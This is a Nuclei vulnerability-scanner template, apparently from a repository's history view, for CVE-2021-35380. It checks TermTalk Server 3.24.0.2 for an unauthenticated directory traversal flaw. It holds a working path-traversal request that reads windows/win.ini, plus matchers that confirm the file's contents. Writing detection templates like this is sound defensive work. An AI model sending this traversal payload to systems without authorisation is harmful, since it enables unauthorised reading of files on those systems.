nuclei-templates/cves/2021/CVE-2021-35380.yaml

33 lines
1.0 KiB
YAML
Raw Normal View History

id: CVE-2021-35380
info:
2022-09-05 10:47:33 +00:00
name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
author: fxploit
severity: high
2022-09-05 04:47:57 +00:00
description: |
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
reference:
- https://www.swascan.com/solari-di-udine/
- https://www.exploit-db.com/exploits/50638
- https://nvd.nist.gov/vuln/detail/CVE-2021-35380
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-35380
cwe-id: CWE-22
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
requests:
- method: GET
path:
- "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
matchers:
- type: word
2022-09-05 04:47:57 +00:00
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and